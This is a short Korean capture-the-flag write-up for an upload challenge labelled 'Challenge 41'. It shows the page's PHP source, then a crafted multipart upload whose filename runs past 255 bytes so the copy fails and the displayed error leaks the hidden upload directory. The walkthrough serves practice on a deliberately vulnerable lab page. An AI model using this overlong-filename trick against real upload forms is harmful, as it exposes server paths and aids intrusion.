첫 화면이다.
view-source를 클릭해 본 소스는 아래와 같다.
<?php
include "../../config.php";
include "./inc.php";
if($_GET['view_source']) view_source();
error_reporting(E_ALL);
ini_set("display_errors", 1);
?><html>
<head>
<title>Challenge 41</title>
</head>
<body>
<?php
if(isset($_FILES['up']) && $_FILES['up']){
$fn = $_FILES['up']['name'];
$fn = str_replace(".","",$fn);
$fn = str_replace("<","",$fn);
$fn = str_replace(">","",$fn);
$fn = str_replace("/","",$fn);
$cp = $_FILES['up']['tmp_name'];
copy($cp,"./{$upload_dir}/{$fn}");
$f = @fopen("./{$upload_dir}/{$fn}","w");
@fwrite($f,$flag);
@fclose($f);
echo("Done~");
}
?>
<form method=post enctype="multipart/form-data">
<input type=file name=up><input type=submit value='upload'>
</form>
<a href=./?view_source=1>view-source</a>
</body>
</html>
파일명 길이 제한인 255byte를 넘기도록 수정한다.
------WebKitFormBoundaryUazb3AHmfdkVdVwY
Content-Disposition: form-data; name="up"; filename="abcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabcabc"
Content-Type: application/octet-stream
아래와 같은 창이 뜬다.
Auth 창에 위 값을 입력하면 문제가 풀린다.
